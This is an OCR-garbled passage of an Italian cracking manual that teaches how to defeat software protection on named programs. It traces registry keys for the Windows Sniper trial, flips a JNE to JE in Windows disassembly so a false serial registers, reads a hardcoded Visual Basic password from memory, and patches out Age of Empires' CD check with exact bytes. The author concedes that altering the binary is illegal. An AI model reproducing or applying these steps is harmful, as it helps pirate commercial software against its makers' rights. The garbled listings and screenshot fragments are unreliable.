Esiste un qualche cosa che ho camuffato per rendere inefficace la sprotezione al 
fine di non commettere un illecito. 

In ogni caso il senso di tutto questo era per dire che spesso utilizziamo 
SofiIlce, Wdasm e similia per debuggare un programma. 

Nell’istante in cui, eseguendo una reversing engineering, riusciamo a trovare le 
chiavi spesso diventa superfluo andare a modificare il codice binario. 
Modificare il codice binario diventa un reato. 

Aggiungere una chiave in un registro esterna non significa toccare il software 
(chissà se regge come giustificazione .. l’arrosto puzza di bruciato !) 

Va beh! Mettiamola così. 

Costa molto di meno come fatica aggiungere nel registro una chiave invece di 
andare a modificare il codice binario. 

Ritorniamo al discorso interrotto relativo ai due programmi usati per eseguire 
un monitoraggio di sistema durante l'installazione di un programma. 

REGSNAP esegue una panoramica al sistema dicendovi se sono state fatte aggiunte, 
cancellazioni o modifiche al file di registro, se è stato cambiato CONFIG.SYS e 
AUTOEXEC.BAT e se sono stati aggiunti, cancellati o modificati files sotto 
\WINDOWS o sotto \WINDOWS\SYSTEM. 

REGSNAP inoltre controlla WIN.INI, SYSTEM.INI e dice anche se qualche files .INI 
è stato creato. 

Nell'immagine in alto c’è la MessageBox mostrata da RegSnap dopo aver fatto il 
primo SnapShot al sistema in cui sono mostrati i dati generali legati a questa. 
Cioè potete vedere viene riportato che nel registro ci sono 61.349 chiavi, 
109.349 valori, in WIN.INI 
ci sono 69 chiavi ecc. 

In primis facciamo una 
panoramica con REGSNAP che 
ci servirà a sapere che cosa 
è avvenuto nel registro. 
Queste informazioni saranno 
quelle che tramite query 
eseguite con le funzioni API 


SICA f Original SnapShol RegQueryValue ecc. saranno 

sal Programmi Pi Final SnapShat richieste dal programma 
= all'attivazione. 

K? Include subdireciorier Alcune voci, sicuramente 

i SA, anonime, probabilmente 

dvrard io car iepiio saranno quelle che 

a E 

TM Dont iemamber Orignal and Fina paths separateh ; 

x stato attivato. 

SNAPPER è un altro 


programmino che esegue una 
panoramica su tutti i files dicendovi se dopo sono stati aggiunti, cancellati o 
modificati files in tutte le parti del sistema. 
Nell'immagine a fianco potete vedere che con SNAPPER è possibile stabilire da 
quale DIR eseguire la panoramica e se si devono includere le sotto directory. 
Se il disco è molto grosso può volerci un pò di tempo per eseguirla. 
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Nel mio caso per questi tipi di lavori uso il disco C: che è un unità da 3 
Gbytes con su i software di sviluppo la quale contiene circa 6000 directories e 
80.000 files. 

Per tale disco ci mette circa 7 minuti su un Pentium a 450Mhz. 

Se la panoramica la estendo a tutti e due i dischi saliamo a 12 Gbytes, 15.000 
directories e 200.000 files con un tempo di circa 20 minuti buoni. 

Se il tempo vi pare troppo potete saltare questa fase che è solo un di più in 
quanto questa serve solo nel caso in cui si vogliano controllare tutte le 
directories del sistema, cosa sicuramente inutile, visto che il programma, se 
dovesse aggiungere files, lo farebbe o nella sua directory, o in quella di 
WINDOWS o nella system di Windows. 

Se scrive il file di controllo nella sua directory non potremmo solo 
osservandola capire quale è, e se lo facesse nella windows o windows\system ci 
penserebbe già RegSnap. 

In ogni caso, se decidete di usare SNAPPER, la prima panoramica creerà una 
maschera di questo tipo nella quale vengono inseriti i dati di tutti i files 
trovati. 

Questa maschera è quella che verrà usata per eseguire le funzioni permesse da 
snapper, che sono poi quelle mostrate dai tabulatori nella finestra. 


i) Snapper DI _ [OX 
File Help 


Size | Modified Attributes 


Examples BulletProofJDesignerPro\Appl... «dir» 
_ServerSide BulletProofJDesignerPro\Appl... <«dir> 
EntityE xamples BulletProof4JDesignerPro\Appl... <dir> 
ClientPart BulletProofJDesignerPro\Appl... <dir> 
ServerPart BulletProofJDesignerPro\Appl... <dir> 
ReadDatalntoDE BulletProofJDesignerPro\Appl... «dir 
RMIExamples BulletProofJDesignerPro\Appl... <dir> 
ClientPart BulletProof4JDesignerPro\Appl... <dir> 
SalesReportEmail BulletProofJDesignerPro\Appl... «dir» 
ClientPart BulletProofJDesignerPro\Appl... «dir 
ServerPart BulletProofJDesignerPro\Appl... <dir> 
Security'alidation BulletProofJDesignerPro\Appl... <dir> 
ClientPart BulletProofJDesignerPro\Appl... <dir> 
ServerPart BulletProofJDesignerPro\Appl... «dir» 
ServerPushExamples BulletProofJDesignerPro\Appl... <dir> 
ClientPart BulletProofJDesignerPro\Appl... <dir> | 


[C: | 52553 items 


Mediante un task manager o mediante NetBusD verificate che non vengano attivati 
dei processi concorrenti, magari nascosti. 

NetBusDetector è una piccolissima utility che controlla il sistema ed avvisa 
tutte le volte che un processo sconosciuto nuovo viene attivato. 

A questo punto abbiamo una panoramica dello stato del nostro sistema prima 
dell’installazione. 

Ora attiviamo il nostro programma ed immediatamente dopo faciamo fare una 
comparazione a REGSNAP. 

I dati risultanti possono essere presentati come file .TXT o come file .HTML. 


Vitas' RegSnap - registry analyzing tool. (http://soft4you.com, vitas@soft4you.com) 
>>> REGSNAP HAS NOT BEEN REGISTERED! PLEASE REGISTER! 
** First snapshot ** 

File name : Regsnp3 
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Snap time : 30/08/1999 23:29:22 
PC/User name: FLAVIO/ 
Comment 


** Second snapshot ** 


File name : Regsnp4 

Snap time : 30/08/1999 23:48:31 
PC/User name: FLAVIO/ 

Comment 


//11///1//////////// Registry report 
Summary info: 

Deleted keys: 0 

Modified keys: 11 

New keys 1 12 


*** Modified keys 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start 
Menu\&Programs\Menu\0rder 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU\19 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\19\CabView 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743- 
11CF -A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F- 
11D0-9888-006097DEACF9}\Count\HRZR_PGYFRFFVBA 
HKEY_USERS\.DEFAULT\Software\Symantec\Norton Commander\NC\settings\Dialogs\IDC_2047 
HKEY_USERS\.DEFAULT\Software\Symantec\Norton Commander\NC\settings\Dialogs\IDC_2048 
HKEY_USERS\.DEFAULT\Software\Symantec\Norton Commander\NC\settings\Panel0\Ascending 
HKEY_USERS\.DEFAULT\Software\Symantec\Norton Commander\NC\settings\Panel0o\CurrentSel 
HKEY_USERS\.DEFAULT\Software\Symantec\Norton Commander\NC\settings\Panel0\0bjectName 
HKEY_USERS\.DEFAULT\Software\Symantec\Norton Commander\NC\settings\Panel0\PanelSelection 


Total positions: 11 


*** New keys 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\WindowsSniper\@ 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\WindowsSniper\Path 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\wWindowsSniper\DisplayName 


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\uninstall\WindowsSniper\UninstallString 
HKEY_LOCAL _MACHINE\Software\unHUman Software\WindowsSniper\EasterEggil 
HKEY_LOCAL_MACHINE\Software\unHUman Software\WindowsSniper\FirstRunTime 
HKEY_LOCAL_MACHINE\Software\unHUman Software\WindowsSniper\Resolution 
HKEY_LOCAL_MACHINE\Software\unHUman Software\WindowsSniper\ShowLicense 
HKEY_LOCAL _MACHINE\Software\unHUman Software\WindowsSniper\XPosition 
HKEY_LOCAL _MACHINE\Software\unHUman Software\WindowsSniper\YPosition 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start 

Menu\&Programs\GkSetup\Order 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start 

Menu\&Programs\0rdiTouch 1.0\0rder 


Total positions: 12 


//11/11/11/11/111/1/11/1///////// File list in C:\WINDOWS\*. * 
Summary info: 

Deleted files: 0 

Modified files: 6 

New files 1 


*** Modified files 
POWERPNT .INI 
SYSTEM. DAT 
SYSTEM.INI 
USER . DAT 
WAVEMIX. INI 
WIN.INI 


Total positions: 6 


*** New files 
WindowsSniper .INI 


Total positions: 1 


/1111/1/11/1////////// File list in C:\WINDOWS\SYSTEM\*.* 


Pagina 402 di 991 


Summary info: 

Deleted files: 0 
Modified files: 0 
New files : 0 


//11111/111//1///////// win.ini report 
Summary info: 

Deleted keys: 0 

Modified keys: 0 

New keys 1 


*** New keys 
WindowsSniper\Configuration 


Total positions: 1 


//11//1/1//////////// System.ini report 
Summary info: 

Deleted keys: 0 

Modified keys: 0 

New keys : 0 


//11/11//////////// G:\autoexec.bat report 
unchanged 


/111111111/1/////// C:\config.sys report 
unchanged 


SA Snapper 
File Help lì 
edfigli 


Modified Attributes 


W'indowsSniper 

Uninst.isu W'indowsSniper\ 2 3008/1999 23... Arc 
WINDOWSSNIPER.DAT  WindowsSniper 3008/1999 23... Arc 
WindowsSniper.exe W'indowsSniper\ 03/05/1999 09... Arc 


W'indowsSniper\ 02/05/1999 14... Arc 


In C:AProgrammi but not in C:AProgrammi [ 5 items 


Dalle analisi fatte con REGSNAP E SNAPPER risultano un certo numero di chiavi 
nel registro modificate e altre aggiunte nuove. 

L'analisi di SNAPPER indica che i files invece riguardano soltanto quelli 
effettivamente presenti nella directory del programma. 

RegSnap però ci mostra che nella directory windows sono stati modificati dei 
files ed è stato aggiunto un file .ini con il nome del programma. 
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Ci tengo a far notare che alcuni programmi relativi alla gestione del registro 
non funzionano sotto Windows 2000 anche se di fatto è ancora prematuro parlare 
di programmi per questo ambiente. 

Guardando le chiavi modificate si capisce che non centrano con il programma ma 
che sicuramente sono relative a programmi che erano attivi in quell’istante e 
che hanno aggiornato delle loro informazioni. 

Nell'esempio si vede chiaramente delle modifiche fatte alla voce di Symantec/NC 
che sarebbe Norton Commander, un programma che uso regolarmente al posto del 
File Manager di Windows. 

A questo dobbiamo solo vedere se ci conviene utilizare SoftIce o Wdasm. 
Personalmente quando è possibile usarlo preferisco WDASM in quanto gran parte 
delle funzioni sono dentro a finestre con pulsanti ed inoltra dispone di un 
ottima gamma di informazioni mostrate automaticamente. 

Caricato sotto WDASM il programma in questione ci mostra un infinità di punti 
idonei a cercare certe routines. 

Se prendiamo in esame soltanto le funzioni importate ci accorgiamo che esiste un 
grosso numero di funzioni legate alla gestione del registro. 

La seguente immagine mostra le informazioni legate appunto a tale tipo di 
gestione. 


ADVAPI32.RegCloseKey 
ADVAPI32.RegConnectRegistryA 
ADVAPI32.RegCreateKeyExA 
ADVAPI32.RegDeleteKeyA 
ADVAPI32.RegDeleteValueA 
ADVAPI32.RegEnumKeyExA 
ADVAPI32.RegEnumValueA 
ADVAPI32.RegFlushKey 
ADVAPI32.RegGetKeySecurity 
ADVAPI32.RegLoadKeyA 
ADVAPI32.RegNotifyChangeKeyValue 
ADVAPI32. RegOpenKeyExA 
ADVAPI32.RegQueryInfoKeyA 
ADVAPI32.RegQueryValueExA 
ADVAPI32.RegReplaceKeyA 
ADVAPI32.RegRestoreKeyA 
ADVAPI32. RegSaveKeyA 


Anche richiedendo la String Table vengono mostrate voci che potrebbero essere 
utili per identificare certe routines. 


String Resource ID=00001: "You must agree to the license before you can use Windows Sni" 
String Resource ID=00002: "SOFTWARE\unHUman Software\WindowsSniper" 

String Resource ID=00003: "This copy of Windows Sniper has already been registered.You" 
String Resource ID=00004: "The 30 day trial of Windows Sniper has expired." 

String Resource ID=00005: "Windows Sniper trial expires in %d days." 

String Resource ID=00006: "FATAL ERROR: System Problem." 

String Resource ID=00007: "Thank you for registering Windows Sniper. You are now entit" 
String Resource ID=00008: "Invalid License Information has been entered. Please try ag" 
String Resource ID=00009: "The 30 day trial of Windows Sniper has expired. Windows Sni" 
String Resource ID=57344: "Windows Sniper" 

String Resource ID=61446: "an unnamed file" 

String Resource ID=61472: "No error message is available." 

String Resource ID=61473: "An unsupported operation was attempted." 

String Resource ID=61474: "A required resource was unavailable." 

String Resource ID=61475: "Out of memory." 

String Resource ID=61476: "An unknown error has occurred." 

String Resource ID=61703: "Failed to launch help." 


Vi ricordo che in WDASM basta fare CLICK su una voce per posizionarsi sulla 
parte di codice che la utilizza. 
In questo caso vengono mostrate anche voci di menu che potrebbero aiutare. 


Menu: MenuID_0086 
Menu: MenuID_0086, Item: "License" 
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Menu: MenuID_0086, Item: "Register" 


Menu: MenuID_008B 
Menu: MenuID_008B 


I dati precedenti si ottengono premendo il ulsante Menu Ref. 

Un punto buono rimane comunque quello fornito dalla MessageBoxA che viene 
utilizzato per avvertire che il codice inserito è errato. 

Voglio ricordarvi che la differenza tra MessageBox e MessageBoxA è data dal 
fatto che la seconda è una funzione a 32 bits. 


ESEMPIO 3 


Questa volta prenderemo in esame un programma al quale possono essere adottate 


due soluzioni. 


La prima, la più complessa, è quella di trovare l'algoritmo del codici da 


inserire. 


La seconda soluzione permette 
deviando il flusso, modificando un 
solo salto, di registrare il 


I II © cOftore in automatico. 


Si carica il software con WDASM e 
si cerca di individuare le routines 
di lettura del codice. 

In questo caso il programma è 


scritto in C e quindi sicuramente 
viene usata una GetDlgItemTextA. 

La ricerca risulta subito fruttuosa 
in quanto vengono trovate un certo 


User Name  |Gregory Braun 
, Organization [Software Design 
4 
Registration 
m n° ' ti ' Annan 


campi. 


numero di chiamate. 

Tre in particolare sono quelle che 
interessano. 

Infatti il programma richiede tre 


* Reference To: USER32.GetDlgItemTextA, Ord:00F5h 


:0040F1CE 8B2D68374300 
:0040F1D4 6A65 
:0040F1D6 8D5E32 


mov ebp, dword ptr [00433768] 


push 


00000065 


lea ebx, dword ptr [esi+32] 


:0040F1D9 57 push edi 
:0040F1DA FFD5 call ebp 

Dopo questa call è stato letto il nome 
:0040F1DC 6A32 push 00000032 
:0040F1DE 53 push ebx 
:0040F1DF 6A66 push 00000066 
:0040F1E1 57 push edi 
:0040F1E2 FFD5 call ebp 


Dopo questa il company 


:0040F1E4 8D442410 
:0040F1E8 6800010000 
:0040F1ED 50 


lea eax, dword ptr [esp+t10] 


push 
push 


00000100 
eax 


* Possible Ref to Menu: MenuID_03E8, Item: "Properties" 
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* Possible Reference to String Resource ID=00103: "Show information about the 
currently selected process" 


| 
:0040F1EE 6A67 push 00000067 


:0040F1F0 57 push edi 
:0040F1F1 FFD5 call ebp 


Infine questa chiamata legge il codice 


:0040F1F3 8D442410 lea eax, dword ptr [esp+t10] 
:0040F1F7 50 push eax 


Se controllate eax vedrete che contiene il codice che avete specificato. 

A questo punto viene chiamata le routine che esegue la preparazione del codice. 
In questo esempio non ci interesseremo della routine se non alla fine per 
mostrare, o meglio suggerire, un metodo per il trace. 


:0040F1F8 E8A3830000 call 004175A0 
:0040F1FD 83C404 add esp, 00000004 
:0040F200 8BE8 mov ebp, eax 
:0040F202 56 push esi 
:0040F203 E818710000 call 00416320 
:0040F208 83C404 add esp, 00000004 


In questo punto avviene il vero controllo. 
Per registrare con un codice errato sarà sufficiente cambiare il salto JNE in 
JE. 


:0040F20B 3D92A71901 cmp eax, 0119A792 
:0040F210 7518 jne 0040F22A 


Riporto un esempio di routine in cui si cerca di capire come è stato composto il 
codice. 

Non cercate di seguirlo visto che il suo unico scopo è quello di dare un idea 
sul come segnarvi il codice man mano che lo seguite. 

Quando eseguite il trace di un codice per cercare di capire che cosa fa, 
lasciate aperto il notepad e man mano che andate avanti copiateci dentro il 
codice, i registri e lo stato dello stack. 

Vi aiuterà a tracciare il tutto. 

Ricordatevi che WDASM possiede vicino ad ogni finestra un pulsante COPY che vi 
permette di copiare il testo specifico di quella window. 

Date un occhiata a quanto segue anche se di fatto si tratta solo della prima 
parte in quanto sarebbe inutile riportarlo tutto. 


:0042DC5E 680B060000 push 0000060B 
:0042DC63 57 push edi 
:0042DC64 E8576D0600 call 004949C0 
:0042DC69 83C664 add esi, 00000064 
:0042DC6C 56 push esi 


* Possible Reference to Dialog: DialogID_01AD, CONTROL_ID:03E9, "" 


| 
:0042DC6D 68E9030000 push 000003E9 


:0042DC72 57 push edi 

:0042DC73 E8486D0600 call 004949C0 -------- + 

:0042DC78 5F pop edi | 

:0042DC79 5E pop esi | 

:0042DC7A C20400 ret 0004 | 
+--------------—-——-------—-—-------------------------- + 


Pagina 406 di 991 


V 


:004949C0 55 push ebp 
:004949C1 8BEC mov ebp, esp 
:004949C3 56 push esi 
:004949C4 57 push edi 
:004949C5 8B7D08 mov edi, dword ptr [ebp+08] 
:004949C8 FF750C push [ebp+0C] 
:004949CB 8BCF mov ecx, edi 
:004949CD E82FFEFFFF call 00494801 
:004949D2 833F00 cmp dword ptr [edi], 00000000 
:004949D5 8BF0 mov esi, eax 
:004949D7 7428 je 00494A01 
:004949D9 56 push esi 
* Reference To: USER32.GetWindowTextLengthA, 0rd:0140h 
| 
:004949DA FF15F4564B00 Call dword ptr [004B56F4] 
:004949E0 8D4801 lea ecx, dword ptr [eax+01] 
:004949E3 51 push ecx 
:004949E4 8B4D10 mov ecx, dword ptr [ebp+10] 
:004949E7 50 push eax 
:004949E8 E8469DFFFF call 0048E733 
:004949ED 50 push eax 
:004949EE 56 push esi 


* Reference To: USER32.GetWindowTextA, 


BP* 


BP*: 


Ord:013Fh 


| 
| BREAKPOINT ON GETWINDOWTEXTA 1!!! 


Vv 
:004949EF call USER32.GetWindowTextA 
:004949F5 mov ecx, dword ptr [ebp+10] 
Address: 01ABD7FC is Not in a Loaded Module. 
char[010]:"9999999999" 
DWORD:39393939, WORD:3939, BYTE:39 
:004949F8 push FFFFFFFF ----------------—-.--—————————————— > + 
:004949FA call ECPRO.0048E70B 
| | 
+------.--------- + | 
V | 
------------- ALTRA FUNZIONE 
:0048E70B push esi | 
:0048E70C mov esi, ecx | 
:0048E70E call ECPRO.0048E275 
0048E713 mov eax, dword ptr [espt08] <-------.---.--.---.--—.-—.—.——.—-—---—--- + 
[esp+00000000] - 00000430 0... | 
[esp+00000004] - 004949ff II. | 
[esp+00000008] - ffffffff su. <--t 
N 
:0048E717 cmp eax, FFFFFFFF <------------- YES------------ + 
:0048E71A jne 0048E724 
:0048E71C push dword ptr [esi] 
[esi+00000000] - 01abd7fc | 
| 
Address: 01ABD7FC 
char[010]:"9999999999" 
DWORD:39393939, WORD:3939, BYTE:39 
:0048E71E call KERNEL32.lstrlen 


API int Arg00 = lstrlen(Arg01) 

API Address=0048E71E, API Return Address=0048E724 
+-- Arg01 = (LPTSTR) 01abd7fc -> "9999999999" 

CALL | 
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:0048E724 mov ecx, dword ptr [esi] 
[ecx+00000000] - 
[ecx+00000004] - 
[ecx+00000008] - 
:0048E726 mov dword ptr [ecx-08], eax 
eax=0000000a 
[ecx-00000008] - 
[ecx-00000004] - 
[ecx+00000000] - 
[ecx+00000004] - 
[ecx+00000008] - 
:0048E729 mov ecx, dword ptr [esi] 
:0048E72B 5E pop esi 
:0048E72C 80240800 and byte 
:0048E730 C20400 ret 0004 
----.------- RITORNO A CHIAMANTE 
| 
| RETURN 
Vv 
BP*:004949FF jmp ECPRO.00494A0C -------------- 
:00494A01 mov eax, dword ptr [ebp+10] 
:00494A04 push dword ptr [eax] 
:00494A06 push esi 
:00494A07 call ECPRO.00492EEF 
:00494A0C pop edi <-----.-----.-.--.--.------ 
:00494A0D pop esi 
:00494A0E pop ebp 
:00494A0F ret 000C 


+-> RESULT for API lstrlen 
Arg00 = (int) 0000000a (10 


39393939 
39393939 
00003939 


0000000a 
0000000a 
39393939 
39393939 
00003939 


9999 
9999 
99.. 


9999 
9999 
99.. 


LEN di 9999999999) 


ptr [eax+tecx], 00 


EIP=00494A0F eax=0000000a ebx=00000001 


ecx=01abd7fc edx=80008d50 


esi=0082f964 


edi=0082f3f0 EBP=0082F41C ESP=0082F3C0 


STATUS STACK 


[esp+00000000] - 0042dc78 x.B. 


- 39393939 9999 


[esp+00000004] - 0082f3f0 


- 39393939 9999 


[esp+00000008] - 000003e9 


- 00003939 99.. 


[esp+0000000C] - 0082f964 d... 
[esp+00000010] - 0070050c ..p. 
[esp+00000014] - 0082f900 


STATUS ECX 


[ecx+00000000] 
[ecx+00000000] 


[ecx+00000008] 


ESEMPIO CON MACCHINA VIRTUALE VISUAL BASIC 


In molti punti di questo volume si è trattato l'argomento relativo ai programmi 
che utilizzano la libreria di run time di Visual Basic 6.0. 
In questo caso i breakpoint dovrebbero essere settati sulle funzioni di questa. 
Come è stato detto alla fine del tutto anche questa libreria si aggancia alle 

funzioni di user32.dll ecc. per cui nella peggire delle ipotesi si potrebbero 

importare queste dll e settare i breakpoint sulle sue funzioni, ma sicuramente 
questo complicherebbe la vita. 
Spesso si cercano subito le ipotesi più complicate scartando quelle più ovvie e 


questo molte 
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volte è un errore, 


VB 6.0 possiede funzioni per il trattamento, compresa la comparazione, di 
stringhe. 

Questo per dire che inizialmente si potrebbe tentare di piazzare breakpoint su 
queste. 

Il seguente esempio mostra un caso che è possibile risolvere cercando queste 
funzioni di comparazione. 

Caricato il programma con WDASM si cercano le funzioni di comparazione stringhe 
in prossimità a qualche funzione che serve all’input del valore. 

Cerchiamo 


MSVBVM60 .rtcInputBox 


Esiste in due punti ma vicino al primo esiste anche una chiamata ad una funzione 
di comparazione stringhe. 


* Reference To: MSVBVM60.rtcInputBox, Ord:0254h 


| 
:00446FC1 FF15D0104000 Call dword ptr [004010D0] 


:00446FC7 8BDO mov edx, eax 
:00446FC9 8D4DE8 lea ecx, dword ptr [ebp-18] 


* Reference To: MSVBVM60.__vbaStrMove, Ord:0000h 
| 
:00446FCC FF15B8124000 Call dword ptr [004012B8g] 


* Reference To: MSVBVM60.__vbaStrCmp, Ord:0000h 
| 


100447008 8B3544114000 mov esi, dword ptr [00401144] 

10044700E 83C420 add esp, 00000020 

:00447011 51 push ecx 

100447012 6840284100 push 00412840 

100447017 FFD6 call esi ; QUESTA E’ LA CHIAMATA a vbaStrCmp 
100447019 85C0 test eax, eax 

:10044701B 0F8462040000 je 00447483 


Le due stringhe da comparare sono piazzate nello stack prima della chiamata. 
Andando ad analizzare ESP+20 (add esp, 0000020) troviamo le stringa che abbiamo 
inserito come password. 

00412840 è l'indirizzo della seconda stringa da comparare. 

In WDASM esistono UA1 e UA2 che permettono di specificare degli indirizzi 
utente. 

Specificando questo indirizzo e guardando nell’apposita finestrlla il valore 
puntato vediamo 


Address: 00412840 is in Module: xxxxxxxx.EXE 
char[000]:"86911260" 


Senza andare a creare patch riavviamo il programma e proviamo a specificare come 
password il 


86911260 


Miracle ! Era proprio lei (o lui ... il codice). 
Questo è un caso in cui se fossimo andati a cercare altro avremmo solo perso 
tempo. 
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ESEMPIO CON I GIOCHI BASATI SULLA PRESENZA CD 


I TOOLS necessari sono SoftIce 3.24 e HIEW 5.92. 

Il gioco in questione possiede una protezione cd check ovvero quel tipo che va a 
vedere se il CD è inserito correttamente ogni volta che viene lanciato. 

Prima di inziare ad usare SoftIce è necessario fare qualche modifica a 
WINICE.DAT. 

Cancelliamo i REM davanti alle EXP relative a USER32, GDI32, KERNEL32. 

A questo punto SoftIce importerà le funzioni di queste DLL. 

Lanciamo ora SoftIce aprendo Empires.exe (avrete capito che mi riferisco ad Age 
of Empires di Microsoft). 

Usiamo per leggerlo la seugenza di opzione di loader32 Modules->Load. 

Settiamo un breakpoint non appena la finestra di SoftIce compare sulla funzione 
GetDriveTypeA (ritorna eax=5 se c’è il CDROM,eax=3 se HDD) 

Il breakpoint viene settato con 


bpx getdrivetypea 


Ripeto per l’ennesima volta che l’ultima lettera A della funzione indica che ci 
riferiamo alla fnzione a 32 bits. 

GetDriveType si riferirebbe a quella a 16 bits. 

Premiamo CONTROL-D per riattivare il gioco ed avanzare nella sua esecuzione. 

Se dovesse comparire nuovamente SoftIce ignoratelo fino al momento in cui si 
arriva al menu. 

Arrivati a questo selezionate SINGLE PLAYER e se tutto è stato eseguito in modo 
corretto SoftIce mostrerà nuovamente la sua finestra. 

Quando verrà ativato il Breakpoint premete F11 in modo da eseguirla e ritornare 
al punto dove è stata chiamata. 

A questo punto siamo dove GetDriveTypeA è stato lanciato. 

Guardatevi un po intorno (CONTROL-(,CONTROL-() sino a vedre qualche cosa di 
simile. 


:004D65F6 Call [Kernel32!GetDriveTypeA] -> Chiama la funzione 
:004D65FC cmp eax, 00000005 -> If CDROM - 
:004D65FF je 004D6605 -> jump a ... 
:004D6601 xor eax, eax -> if not : eax=0 
:004D6603 jmp 004D6658 -> ... @ ritorna. 
:004D6605 lea eax, dword ptr [esp+0000011C] -> Volume-check 


:004D660C push 00000100 

:004D6611 lea ecx, dword ptr [esp+1C] 
:004D6615 push eax 

:004D6616 lea edx, dword ptr [esp+t1C] 
:004D661A push ecx 

:004D661B lea eax, dword ptr [esp+t1C] 
:004D661F push edx 

:004D6620 lea ecx, dword ptr [esp+2C] 
:004D6624 push eax 

:004D6625 push 00000100 

:004D662A push ecx 

:004D662B push edi 

:004D662C Call [Kernel32!GetVolumeInformationA] -> Volume-check 


:004D6632 test eax, eax -> è un CD-ROM nel drive ? 
:004D6634 mov eax, 00000000 -> eax=0 

:004D6639 je 004D6658 -> no ! return con eax=0 ! 
:004D663B mov eax, dword ptr [esi+0C] 

:004D663E lea ecx, dword ptr [esp+t1C] -> ecx = CD-ROM label 
:004D6642 add eax, 000002FD -> eax = Label (A0E) 


:004D6647 push eax 
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:004D6648 push ecx 


:004D6649 call 00533C50 -> interessante 

:004D664E add esp, 00000008 

:004D664F cmp eax, 00000001 -> Se eax=1 ... setta register flags 
:004D6654 sbb eax, eax -> eax=eax-(eax+c) 

:004D6656 neg eax -> 'invert' eax 


:004D6658 pop ebp 

:004D6659 pop edi 

:004D665A pop esi 

:004D665B pop ebx 

:004D665C add esp, 0000020C 

:004D6662 ret 0004 -> ... return 


Diamo un occhiata alla calla marcata come interessante (solo la parte finale). 


:00533C50 55 push ebp 

:00533C51 8BEC mov ebp, esp 

:00533C53 57 push edi 

:00533C54 56 push esi 

:00533C55 53 push ebx 

:00533C56 8B750C mov esi, dword ptr [ebp+0C] 
:00533C59 8B7D08 mov edi, dword ptr [ebp+08] 
:00533C5C 8D05D08E5600 lea eax, dword ptr [00568ED0] 
:00533C62 83780800 cmp dword ptr [eax+08], 00000000 
:00533C66 753B jne 00533CA3 

:00533C68 BOFF mov al, FF 

:00533C6A 8BCO mov eax, eax 

:00533CC6 E845070000 call 00534410 

:100533CCB 83C404 add esp, 00000004 

:00533CCE 38C3 cmp bl, al 

:00533CDO 74DA je 00533CAC 

:00533CD2 1BC0 sbb eax, eax 

:00533CD4 83D8FF sbb eax, FFFFFFFF 

:00533CD7 5B pop ebx 

:00533CD8 5E pop esi 

:00533CD9 5F pop edi 

:00533CDA C9 leave 

:00533CDB C3 ret 


La funzione è complicata ma a noi non interessa sapere come funziona ma solo 
capire che cosa fa modificando qualche variabile e flag. 

Seguendo questa procedura s arriva a capire che la funzione ritorna 1 o FFFFFFFF 
se è stato inserito un CD non valido. 

A questo punto possiamo affermare che questa funzione deve ritornare 0 se il CD 
corretto è stato inserito. 

Prima di ritornare dalla funzione inseriamo in EAX 0 e facciamo la prova. 
Digitiamo 

r eax=0 

e subito CONTROL D per proseguire. 

La cosa funziona. 


Ma prima di cantare vittoria diamo un occhiata al codice immediatamente dopo al 
ritorno della funzione. 


:004D664E 83C403 add esp, 00000008 

:004D6651 83F801 cmp eax, 00000001 -> if eax=1 . set Z ;jor C if eax=0 
:004D6654 1BC0O sbb eax, eax -> eax=1-1 => eax=0 

:004D6656 F7D8 neg eax -> 'invert' eax => eax=0 

:004D6658 5D pop ebp 

:004D6659 5F pop edi 

:004D665A 5E pop esi 
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:004D665B 5B pop ebx 
1004D665C 81C40C020000 add esp, 0000020C 
:004D6662 C20400 ret 0004 -> ... and return 


La cosa strana è che normalmente le funzioni indicano che qualche cosa è andata 
a male restituendo © ed invece 1 se tutto è QK. 
Proviamo a vedere cosa capita se la funzione ritorna con uno 0. 


:004D6651 cmp eax, 00000001 -> if eax=1 ... (set C=1) 
:004D6654 sbb eax, eax -> eax=eax-(eax+c) => eax=0-1=FFFFFFFF 
:004D6656 neg eax -> 'invert' eax => eax=1 


A questo punto ci troviamo dinanzi a due vie per crackare il programma. 

Possiamo settare eax=1 in questa funzione oppure un eax=0 nella funzione 
chiamata. 

Potrebbe anche capitare che il gioco durante la sua esecuzione cerchi nuovamente 
di testare la protezione non passando da questa funzione. 

Considerando questo allora la cosa conveniente è quella di andare ad inserire 
mov eax, 0 nella funzione chiamata. 

Per fare questo tramite un HEX View andiamo a ricercare 8D05D08E560083780800. 
Posizionatevi sull'istruzione che deve essere sostituita 


mov esi, [ebp][0000C] 

Il codice dell’istruzione da inserire è 

B800000000 

al posto di quella appena vista. 

In questo caso non è stato necessario andare a ricercare funzioni strane per la 


serializzazione. 
Molti giochi utilizzano questo tipo di protezione. 


USARE SMARTCHECK 


Abbiamo visto parlando dei vari 


[default] - NuMega SmartCheck Settings 2|x| È È 
programmi di un altro prodotto NuMega. 
Eno: Detection” Repoting | Program Ino | In alcuni casi, quando il programma è 
SmartCheck will normally begin reporting events and errors immediately after starting the in visual Basic ; PU ò essere utile. 


program. If you would like to control when event reporting starts, clear the setting below. 


Vediamo un esempio usando SmartCheck. 
Riferiamoci al programma Visual Day 


Start event reporting when starting this program 


- Report additional events P 1 anner 6.1 
Information about the events below is sometimes valuable in diagnosing problems, but E : . E 
can significantly increase the disk space used by SmartCheck as it reports events. Ese gulamo SmartCheck e settiamo i 


Select the events you would like SmartCheck to include in its reports. 


parametri come si può vedere 
nell'immagine successiva. 

TT Report MouseMove events from In pratica selezionando 

FW Report Windows messages Program/Settings dovrete settare tutti 

MW Report callback and hook functions i flag meno Report MouseMove. 

Dopo aver fatto questo settaggio 

